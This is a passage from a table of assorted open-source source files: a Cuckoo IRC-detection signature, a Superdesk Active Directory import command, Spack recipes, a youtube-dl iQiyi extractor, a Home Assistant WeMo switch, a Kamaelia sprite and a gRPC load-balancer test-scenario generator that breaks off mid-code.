| code | repo_name | path | language | license | size |
|---|---|---|---|---|---|
# Copyright (C) 2013 Claudio "nex" Guarnieri (@botherder)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lib.cuckoo.common.abstracts import Signature
class NetworkIRC(Signature):
name = "network_irc"
description = "Connects to an IRC server, possibly part of a botnet"
severity = 3
categories = ["irc"]
authors = ["nex"]
minimum = "0.6"
def run(self):
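        # self.results["network"]["irc"] is assumed to hold the IRC traffic
        # records produced by Cuckoo's network analysis module; any entry at
        # all is treated as IRC activity worth flagging.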
if "irc" in self.results["network"]:
if len(self.results["network"]["irc"]) > 0:
return True
return False
| 0x00ach/zer0m0n | signatures/network_irc.py | Python | gpl-3.0 | 1,128 |
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('course_action_state.tests.test_rerun_manager', 'common.djangoapps.course_action_state.tests.test_rerun_manager')
from common.djangoapps.course_action_state.tests.test_rerun_manager import *
| eduNEXT/edunext-platform | import_shims/studio/course_action_state/tests/test_rerun_manager.py | Python | agpl-3.0 | 461 |
# Copyright 2008-2015 Canonical
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further info, check http://launchpad.net/filesync-server
"""Add db_worker_unseen table to keep track of unseen items on the database
side.
"""
SQL = [
"""
CREATE TABLE txlog.db_worker_unseen (
id INTEGER NOT NULL,
worker_id TEXT NOT NULL,
created TIMESTAMP WITHOUT TIME ZONE NOT NULL DEFAULT \
timezone('UTC'::text, now())
)
""",
"""
GRANT SELECT, INSERT, UPDATE, DELETE
ON TABLE txlog.db_worker_unseen
TO storage, webapp
""",
"""
CREATE INDEX db_worker_unseen_idx
ON txlog.db_worker_unseen(worker_id, created, id)
"""
]
def apply(store):
"""Apply the patch"""
for statement in SQL:
store.execute(statement)
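
# Minimal sketch of driving this patch module (assumes a Storm-style store
# whose execute() runs raw SQL; the helper name is hypothetical):
#
#     store = get_txlog_store()
#     apply(store)
#     store.commit()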
| zhsso/ubunto-one | src/backends/db/schemas/txlog/patch_4.py | Python | agpl-3.0 | 1,421 |
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import logging
from flask import current_app as app
from superdesk.errors import SuperdeskApiError
import superdesk
from .ldap import ADAuth, add_default_values, get_user_query
logger = logging.getLogger(__name__)
class ImportUserProfileFromADCommand(superdesk.Command):
"""
Responsible for importing a user profile from Active Directory (AD) to Mongo.
This command runs on assumption that the user executing this command and
the user whose profile need to be imported need not to be the same. Uses ad_username and ad_password to bind to AD
and then searches for a user identified by username_to_import and if found imports into Mongo.
"""
option_list = (
superdesk.Option('--ad_username', '-adu', dest='ad_username', required=True),
superdesk.Option('--ad_password', '-adp', dest='ad_password', required=True),
superdesk.Option('--username_to_import', '-u', dest='username', required=True),
superdesk.Option('--admin', '-a', dest='admin', required=False),
)
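
    # Example invocation (hypothetical values; the manage-script name may
    # differ per deployment):
    #   python manage.py users:copyfromad -adu binduser -adp secret -u jdoe -a true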
def run(self, ad_username, ad_password, username, admin='false'):
"""
Imports or Updates a User Profile from AD to Mongo.
:param ad_username: Active Directory Username
:param ad_password: Password of Active Directory Username
:param username: Username as in Active Directory whose profile needs to be imported to Superdesk.
:return: User Profile.
"""
        # the --admin flag arrives as a string; treat a case-insensitive
        # 'true' as a request for an administrator profile
        user_type = 'administrator' if admin is not None and admin.lower() == 'true' else 'user'
# Authenticate and fetch profile from AD
settings = app.settings
ad_auth = ADAuth(settings['LDAP_SERVER'], settings['LDAP_SERVER_PORT'], settings['LDAP_BASE_FILTER'],
settings['LDAP_USER_FILTER'], settings['LDAP_USER_ATTRIBUTES'], settings['LDAP_FQDN'])
user_data = ad_auth.authenticate_and_fetch_profile(ad_username, ad_password, username)
if len(user_data) == 0:
raise SuperdeskApiError.notFoundError('Username not found')
# Check if User Profile already exists in Mongo
user = superdesk.get_resource_service('users').find_one(req=None, **get_user_query(username))
if user:
superdesk.get_resource_service('users').patch(user.get('_id'), user_data)
else:
add_default_values(user_data, username, user_type=user_type)
superdesk.get_resource_service('users').post([user_data])
return user_data
superdesk.command('users:copyfromad', ImportUserProfileFromADCommand())
| sivakuna-aap/superdesk | server/apps/ldap/commands.py | Python | agpl-3.0 | 2,913 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RTriebeard(RPackage):
"""triebeard: 'Radix' Trees in 'Rcpp'"""
homepage = "https://github.com/Ironholds/triebeard/"
url = "https://cloud.r-project.org/src/contrib/triebeard_0.3.0.tar.gz"
list_url = "https://cloud.r-project.org/src/contrib/Archive/triebeard"
version('0.3.0', sha256='bf1dd6209cea1aab24e21a85375ca473ad11c2eff400d65c6202c0fb4ef91ec3')
depends_on('r-rcpp', type=('build', 'run'))
| LLNL/spack | var/spack/repos/builtin/packages/r-triebeard/package.py | Python | lgpl-2.1 | 652 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyEpydoc(PythonPackage):
"""Epydoc is a tool for generating API documentation documentation for
Python modules, based on their docstrings."""
pypi = "epydoc/epydoc-3.0.1.tar.gz"
version('3.0.1', sha256='c81469b853fab06ec42b39e35dd7cccbe9938dfddef324683d89c1e5176e48f2')
| LLNL/spack | var/spack/repos/builtin/packages/py-epydoc/package.py | Python | lgpl-2.1 | 516 |
# coding: utf-8
from __future__ import unicode_literals
import hashlib
import math
import random
import time
import uuid
from .common import InfoExtractor
from ..compat import compat_urllib_parse
from ..utils import ExtractorError
class IqiyiIE(InfoExtractor):
IE_NAME = 'iqiyi'
IE_DESC = '爱奇艺'
_VALID_URL = r'http://(?:[^.]+\.)?iqiyi\.com/.+\.html'
_TESTS = [{
'url': 'http://www.iqiyi.com/v_19rrojlavg.html',
'md5': '2cb594dc2781e6c941a110d8f358118b',
'info_dict': {
'id': '9c1fb1b99d192b21c559e5a1a2cb3c73',
'title': '美国德州空中惊现奇异云团 酷似UFO',
'ext': 'f4v',
}
}, {
'url': 'http://www.iqiyi.com/v_19rrhnnclk.html',
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb',
'title': '名侦探柯南第752集',
},
'playlist': [{
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part1',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part2',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part3',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part4',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part5',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part6',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part7',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}, {
'info_dict': {
'id': 'e3f585b550a280af23c98b6cb2be19fb_part8',
'ext': 'f4v',
'title': '名侦探柯南第752集',
},
}],
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.iqiyi.com/w_19rt6o8t9p.html',
'only_matching': True,
}, {
'url': 'http://www.iqiyi.com/a_19rrhbc6kt.html',
'only_matching': True,
}, {
'url': 'http://yule.iqiyi.com/pcb.html',
'only_matching': True,
}]
_FORMATS_MAP = [
('1', 'h6'),
('2', 'h5'),
('3', 'h4'),
('4', 'h3'),
('5', 'h2'),
('10', 'h1'),
]
@staticmethod
def md5_text(text):
return hashlib.md5(text.encode('utf-8')).hexdigest()
def construct_video_urls(self, data, video_id, _uuid):
def do_xor(x, y):
a = y % 3
if a == 1:
return x ^ 121
if a == 2:
return x ^ 72
return x ^ 103
def get_encode_code(l):
a = 0
b = l.split('-')
c = len(b)
s = ''
for i in range(c - 1, -1, -1):
a = do_xor(int(b[c - i - 1], 16), i)
s += chr(a)
return s[::-1]
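
        # get_encode_code() undoes a simple obfuscation: each '-'-separated
        # hex byte is XOR'ed with 103, 121 or 72 (chosen by its distance from
        # the end of the list modulo 3) and the decoded string is reversed.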
def get_path_key(x, format_id, segment_index):
mg = ')(*&^flash@#$%a'
tm = self._download_json(
'http://data.video.qiyi.com/t?tn=' + str(random.random()), video_id,
note='Download path key of segment %d for format %s' % (segment_index + 1, format_id)
)['t']
t = str(int(math.floor(int(tm) / (600.0))))
return self.md5_text(t + mg + x)
video_urls_dict = {}
for format_item in data['vp']['tkl'][0]['vs']:
if 0 < int(format_item['bid']) <= 10:
format_id = self.get_format(format_item['bid'])
else:
continue
video_urls = []
video_urls_info = format_item['fs']
if not format_item['fs'][0]['l'].startswith('/'):
t = get_encode_code(format_item['fs'][0]['l'])
if t.endswith('mp4'):
video_urls_info = format_item['flvs']
for segment_index, segment in enumerate(video_urls_info):
vl = segment['l']
if not vl.startswith('/'):
vl = get_encode_code(vl)
key = get_path_key(
vl.split('/')[-1].split('.')[0], format_id, segment_index)
filesize = segment['b']
base_url = data['vp']['du'].split('/')
base_url.insert(-1, key)
base_url = '/'.join(base_url)
param = {
'su': _uuid,
'qyid': uuid.uuid4().hex,
'client': '',
'z': '',
'bt': '',
'ct': '',
'tn': str(int(time.time()))
}
api_video_url = base_url + vl + '?' + \
compat_urllib_parse.urlencode(param)
js = self._download_json(
api_video_url, video_id,
note='Download video info of segment %d for format %s' % (segment_index + 1, format_id))
video_url = js['l']
video_urls.append(
(video_url, filesize))
video_urls_dict[format_id] = video_urls
return video_urls_dict
def get_format(self, bid):
matched_format_ids = [_format_id for _bid, _format_id in self._FORMATS_MAP if _bid == str(bid)]
return matched_format_ids[0] if len(matched_format_ids) else None
def get_bid(self, format_id):
matched_bids = [_bid for _bid, _format_id in self._FORMATS_MAP if _format_id == format_id]
return matched_bids[0] if len(matched_bids) else None
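
    # Per _FORMATS_MAP: get_format(3) -> 'h4' and get_bid('h2') -> '5'; both
    # helpers return None when the lookup finds no match.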
def get_raw_data(self, tvid, video_id, enc_key, _uuid):
tm = str(int(time.time()))
tail = tm + tvid
param = {
'key': 'fvip',
'src': self.md5_text('youtube-dl'),
'tvId': tvid,
'vid': video_id,
'vinfo': 1,
'tm': tm,
'enc': self.md5_text(enc_key + tail),
'qyid': _uuid,
'tn': random.random(),
'um': 0,
'authkey': self.md5_text(self.md5_text('') + tail),
}
api_url = 'http://cache.video.qiyi.com/vms' + '?' + \
compat_urllib_parse.urlencode(param)
raw_data = self._download_json(api_url, video_id)
return raw_data
def get_enc_key(self, swf_url, video_id):
# TODO: automatic key extraction
# last update at 2015-12-18 for Zombie::bite
enc_key = '8b6b683780897eb8d9a48a02ccc4817d'[::-1]
return enc_key
def _real_extract(self, url):
webpage = self._download_webpage(
url, 'temp_id', note='download video page')
tvid = self._search_regex(
r'data-player-tvid\s*=\s*[\'"](\d+)', webpage, 'tvid')
video_id = self._search_regex(
r'data-player-videoid\s*=\s*[\'"]([a-f\d]+)', webpage, 'video_id')
swf_url = self._search_regex(
r'(http://[^\'"]+MainPlayer[^.]+\.swf)', webpage, 'swf player URL')
_uuid = uuid.uuid4().hex
enc_key = self.get_enc_key(swf_url, video_id)
raw_data = self.get_raw_data(tvid, video_id, enc_key, _uuid)
if raw_data['code'] != 'A000000':
raise ExtractorError('Unable to load data. Error code: ' + raw_data['code'])
if not raw_data['data']['vp']['tkl']:
            raise ExtractorError('iQiyi VIP videos are not supported')
data = raw_data['data']
title = data['vi']['vn']
# generate video_urls_dict
video_urls_dict = self.construct_video_urls(
data, video_id, _uuid)
# construct info
entries = []
for format_id in video_urls_dict:
video_urls = video_urls_dict[format_id]
for i, video_url_info in enumerate(video_urls):
if len(entries) < i + 1:
entries.append({'formats': []})
entries[i]['formats'].append(
{
'url': video_url_info[0],
'filesize': video_url_info[-1],
'format_id': format_id,
'preference': int(self.get_bid(format_id))
}
)
for i in range(len(entries)):
self._sort_formats(entries[i]['formats'])
entries[i].update(
{
'id': '%s_part%d' % (video_id, i + 1),
'title': title,
}
)
if len(entries) > 1:
info = {
'_type': 'multi_video',
'id': video_id,
'title': title,
'entries': entries,
}
else:
info = entries[0]
info['id'] = video_id
info['title'] = title
return info
| atomic83/youtube-dl | youtube_dl/extractor/iqiyi.py | Python | unlicense | 9,558 |
"""Support for WeMo switches."""
import asyncio
import logging
from datetime import datetime, timedelta
import requests
import async_timeout
from homeassistant.components.switch import SwitchDevice
from homeassistant.exceptions import PlatformNotReady
from homeassistant.util import convert
from homeassistant.const import (
STATE_OFF, STATE_ON, STATE_STANDBY, STATE_UNKNOWN)
from . import SUBSCRIPTION_REGISTRY
SCAN_INTERVAL = timedelta(seconds=10)
_LOGGER = logging.getLogger(__name__)
ATTR_SENSOR_STATE = 'sensor_state'
ATTR_SWITCH_MODE = 'switch_mode'
ATTR_CURRENT_STATE_DETAIL = 'state_detail'
ATTR_COFFEMAKER_MODE = 'coffeemaker_mode'
MAKER_SWITCH_MOMENTARY = 'momentary'
MAKER_SWITCH_TOGGLE = 'toggle'
WEMO_ON = 1
WEMO_OFF = 0
WEMO_STANDBY = 8
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up discovered WeMo switches."""
from pywemo import discovery
if discovery_info is not None:
location = discovery_info['ssdp_description']
mac = discovery_info['mac_address']
try:
device = discovery.device_from_description(location, mac)
except (requests.exceptions.ConnectionError,
requests.exceptions.Timeout) as err:
_LOGGER.error("Unable to access %s (%s)", location, err)
raise PlatformNotReady
if device:
add_entities([WemoSwitch(device)])
class WemoSwitch(SwitchDevice):
"""Representation of a WeMo switch."""
def __init__(self, device):
"""Initialize the WeMo switch."""
self.wemo = device
self.insight_params = None
self.maker_params = None
self.coffeemaker_mode = None
self._state = None
self._mode_string = None
self._available = True
self._update_lock = None
self._model_name = self.wemo.model_name
self._name = self.wemo.name
self._serialnumber = self.wemo.serialnumber
def _subscription_callback(self, _device, _type, _params):
"""Update the state by the Wemo device."""
_LOGGER.info("Subscription update for %s", self.name)
updated = self.wemo.subscription_update(_type, _params)
self.hass.add_job(
self._async_locked_subscription_callback(not updated))
async def _async_locked_subscription_callback(self, force_update):
"""Handle an update from a subscription."""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
await self._async_locked_update(force_update)
self.async_schedule_update_ha_state()
@property
def unique_id(self):
"""Return the ID of this WeMo switch."""
return self._serialnumber
@property
def name(self):
"""Return the name of the switch if any."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
attr = {}
if self.maker_params:
# Is the maker sensor on or off.
if self.maker_params['hassensor']:
# Note a state of 1 matches the WeMo app 'not triggered'!
if self.maker_params['sensorstate']:
attr[ATTR_SENSOR_STATE] = STATE_OFF
else:
attr[ATTR_SENSOR_STATE] = STATE_ON
# Is the maker switch configured as toggle(0) or momentary (1).
if self.maker_params['switchmode']:
attr[ATTR_SWITCH_MODE] = MAKER_SWITCH_MOMENTARY
else:
attr[ATTR_SWITCH_MODE] = MAKER_SWITCH_TOGGLE
if self.insight_params or (self.coffeemaker_mode is not None):
attr[ATTR_CURRENT_STATE_DETAIL] = self.detail_state
if self.insight_params:
attr['on_latest_time'] = \
WemoSwitch.as_uptime(self.insight_params['onfor'])
attr['on_today_time'] = \
WemoSwitch.as_uptime(self.insight_params['ontoday'])
attr['on_total_time'] = \
WemoSwitch.as_uptime(self.insight_params['ontotal'])
attr['power_threshold_w'] = \
convert(
self.insight_params['powerthreshold'], float, 0.0
) / 1000.0
if self.coffeemaker_mode is not None:
attr[ATTR_COFFEMAKER_MODE] = self.coffeemaker_mode
return attr
@staticmethod
def as_uptime(_seconds):
"""Format seconds into uptime string in the format: 00d 00h 00m 00s."""
uptime = datetime(1, 1, 1) + timedelta(seconds=_seconds)
return "{:0>2d}d {:0>2d}h {:0>2d}m {:0>2d}s".format(
uptime.day-1, uptime.hour, uptime.minute, uptime.second)
@property
def current_power_w(self):
"""Return the current power usage in W."""
if self.insight_params:
return convert(
self.insight_params['currentpower'], float, 0.0
) / 1000.0
@property
def today_energy_kwh(self):
"""Return the today total energy usage in kWh."""
if self.insight_params:
            milliwatts = convert(self.insight_params['todaymw'], float, 0.0)
            return round(milliwatts / (1000.0 * 1000.0 * 60), 2)
@property
def detail_state(self):
"""Return the state of the device."""
if self.coffeemaker_mode is not None:
return self._mode_string
if self.insight_params:
standby_state = int(self.insight_params['state'])
if standby_state == WEMO_ON:
return STATE_ON
if standby_state == WEMO_OFF:
return STATE_OFF
if standby_state == WEMO_STANDBY:
return STATE_STANDBY
return STATE_UNKNOWN
@property
def is_on(self):
"""Return true if switch is on. Standby is on."""
return self._state
@property
def available(self):
"""Return true if switch is available."""
return self._available
@property
def icon(self):
"""Return the icon of device based on its type."""
if self._model_name == 'CoffeeMaker':
return 'mdi:coffee'
return None
def turn_on(self, **kwargs):
"""Turn the switch on."""
self.wemo.on()
def turn_off(self, **kwargs):
"""Turn the switch off."""
self.wemo.off()
async def async_added_to_hass(self):
"""Wemo switch added to HASS."""
# Define inside async context so we know our event loop
self._update_lock = asyncio.Lock()
registry = SUBSCRIPTION_REGISTRY
await self.hass.async_add_job(registry.register, self.wemo)
registry.on(self.wemo, None, self._subscription_callback)
async def async_update(self):
"""Update WeMo state.
Wemo has an aggressive retry logic that sometimes can take over a
minute to return. If we don't get a state after 5 seconds, assume the
Wemo switch is unreachable. If update goes through, it will be made
available again.
"""
# If an update is in progress, we don't do anything
if self._update_lock.locked():
return
try:
with async_timeout.timeout(5):
await asyncio.shield(self._async_locked_update(True))
except asyncio.TimeoutError:
_LOGGER.warning('Lost connection to %s', self.name)
self._available = False
async def _async_locked_update(self, force_update):
"""Try updating within an async lock."""
async with self._update_lock:
await self.hass.async_add_job(self._update, force_update)
def _update(self, force_update):
"""Update the device state."""
try:
self._state = self.wemo.get_state(force_update)
if self._model_name == 'Insight':
self.insight_params = self.wemo.insight_params
self.insight_params['standby_state'] = (
self.wemo.get_standby_state)
elif self._model_name == 'Maker':
self.maker_params = self.wemo.maker_params
elif self._model_name == 'CoffeeMaker':
self.coffeemaker_mode = self.wemo.mode
self._mode_string = self.wemo.mode_string
if not self._available:
_LOGGER.info('Reconnected to %s', self.name)
self._available = True
except AttributeError as err:
_LOGGER.warning("Could not update status for %s (%s)",
self.name, err)
self._available = False
| MartinHjelmare/home-assistant | homeassistant/components/wemo/switch.py | Python | apache-2.0 | 8,674 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
import pygame
from Axon.Component import component
class BasicSprite(pygame.sprite.Sprite, component):
Inboxes=["translation", "imaging","inbox", "control"]
allsprites = []
    def __init__(self, imagepath, name, pos=None, border=40):
pygame.sprite.Sprite.__init__(self)
component.__init__(self)
self.imagepath = imagepath
self.image = None
self.original = None
self.rect = None
self.pos = pos
        if self.pos is None:
self.pos = [100,100]
self.dir = ""
self.name = name
self.update = self.sprite_logic().next
self.screensize = (924,658)
self.border = border
self.__class__.allsprites.append(self)
def allSprites(klass):
return klass.allsprites
allSprites = classmethod(allSprites)
def sprite_logic(self):
while 1:
yield 1
def main(self):
self.image = pygame.image.load(self.imagepath)
self.original = self.image
self.image = self.original
self.rect = self.image.get_rect()
self.rect.center = self.pos
center = list(self.rect.center)
current = self.image
pos = center
dx,dy = 0,0
d = 10 # Change me to change the velocity of the sprite
while 1:
self.image = current
if self.dataReady("imaging"):
self.image = self.recv("imaging")
current = self.image
if self.dataReady("translation"):
pos = self.recv("translation")
if self.dataReady("inbox"):
event = self.recv("inbox")
if event == "start_up": dy = dy + d
if event == "stop_up": dy = dy - d
if event == "start_down": dy = dy - d
if event == "stop_down": dy = dy + d
if event == "start_right": dx = dx + d
if event == "stop_right": dx = dx - d
if event == "start_left": dx = dx - d
if event == "stop_left": dx = dx + d
if dx !=0 or dy != 0:
self.pos[0] += dx
                if self.pos[0] > self.screensize[0] - self.border: self.pos[0] = self.screensize[0] - self.border
                if self.pos[1] > self.screensize[1] - self.border: self.pos[1] = self.screensize[1] - self.border
                if self.pos[0] < self.border: self.pos[0] = self.border
                if self.pos[1] < self.border: self.pos[1] = self.border
self.pos[1] -= dy
self.rect.center = (self.pos)
self.send(self.pos, "outbox")
yield 1
| sparkslabs/kamaelia_ | Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/Games4Kids/BasicSprite.py | Python | apache-2.0 | 3,562 |
#!/usr/bin/env python3
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates the appropriate JSON data for LB interop test scenarios."""
import json
import os
import yaml
all_scenarios = []
# TODO(https://github.com/grpc/grpc-go/issues/2347): enable
# client_falls_back_because_no_backends_* scenarios for Java/Go.
# TODO(https://github.com/grpc/grpc-java/issues/4887): enable
# *short_stream* scenarios for Java.
# TODO(https://github.com/grpc/grpc-java/issues/4912): enable
# Java TLS tests involving TLS to the balancer.
def server_sec(transport_sec):
if transport_sec == 'google_default_credentials':
return 'alts', 'alts', 'tls'
return transport_sec, transport_sec, transport_sec
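
# e.g. server_sec('google_default_credentials') -> ('alts', 'alts', 'tls');
# any other transport_sec is used unchanged for balancer, backend and fallback.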
def generate_no_balancer_because_lb_a_record_returns_nx_domain():
all_configs = []
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
config = {
'name':
'no_balancer_because_lb_a_record_returns_nx_domain_%s' %
transport_sec,
'skip_langs': [],
'transport_sec':
transport_sec,
'balancer_configs': [],
'backend_configs': [],
'fallback_configs': [{
'transport_sec': fallback_sec,
}],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_no_balancer_because_lb_a_record_returns_nx_domain()
def generate_no_balancer_because_lb_a_record_returns_no_data():
all_configs = []
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
config = {
'name':
'no_balancer_because_lb_a_record_returns_no_data_%s' %
transport_sec,
'skip_langs': [],
'transport_sec':
transport_sec,
'balancer_configs': [],
'backend_configs': [],
'fallback_configs': [{
'transport_sec': fallback_sec,
}],
'cause_no_error_no_data_for_balancer_a_record':
True,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_no_balancer_because_lb_a_record_returns_no_data()
def generate_client_referred_to_backend():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_referred_to_backend_%s_short_stream_%s' %
(transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
}],
'backend_configs': [{
'transport_sec': backend_sec,
}],
'fallback_configs': [],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_referred_to_backend()
def generate_client_referred_to_backend_fallback_broken():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in ['alts', 'tls', 'google_default_credentials']:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_referred_to_backend_fallback_broken_%s_short_stream_%s'
% (transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
}],
'backend_configs': [{
'transport_sec': backend_sec,
}],
'fallback_configs': [{
'transport_sec': 'insecure',
}],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_referred_to_backend_fallback_broken()
def generate_client_referred_to_backend_multiple_backends():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_referred_to_backend_multiple_backends_%s_short_stream_%s'
% (transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
}],
'backend_configs': [{
'transport_sec': backend_sec,
}, {
'transport_sec': backend_sec,
}, {
'transport_sec': backend_sec,
}, {
'transport_sec': backend_sec,
}, {
'transport_sec': backend_sec,
}],
'fallback_configs': [],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_referred_to_backend_multiple_backends()
def generate_client_falls_back_because_no_backends():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = ['go', 'java']
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_falls_back_because_no_backends_%s_short_stream_%s' %
(transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
}],
'backend_configs': [],
'fallback_configs': [{
'transport_sec': fallback_sec,
}],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_falls_back_because_no_backends()
def generate_client_falls_back_because_balancer_connection_broken():
all_configs = []
for transport_sec in ['alts', 'tls', 'google_default_credentials']:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs = ['java']
config = {
'name':
'client_falls_back_because_balancer_connection_broken_%s' %
transport_sec,
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [{
'transport_sec': 'insecure',
'short_stream': False,
}],
'backend_configs': [],
'fallback_configs': [{
'transport_sec': fallback_sec,
}],
'cause_no_error_no_data_for_balancer_a_record':
False,
}
all_configs.append(config)
return all_configs
all_scenarios += generate_client_falls_back_because_balancer_connection_broken()
def generate_client_referred_to_backend_multiple_balancers():
all_configs = []
for balancer_short_stream in [True, False]:
for transport_sec in [
'insecure', 'alts', 'tls', 'google_default_credentials'
]:
balancer_sec, backend_sec, fallback_sec = server_sec(transport_sec)
skip_langs = []
if transport_sec == 'tls':
skip_langs += ['java']
if balancer_short_stream:
skip_langs += ['java']
config = {
'name':
'client_referred_to_backend_multiple_balancers_%s_short_stream_%s'
% (transport_sec, balancer_short_stream),
'skip_langs':
skip_langs,
'transport_sec':
transport_sec,
'balancer_configs': [
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
{
'transport_sec': balancer_sec,
'short_stream': balancer_short_stream,
},
],
'backend_configs': [{
'transport_sec': backend_sec,
},],
'fallback_configs': [],
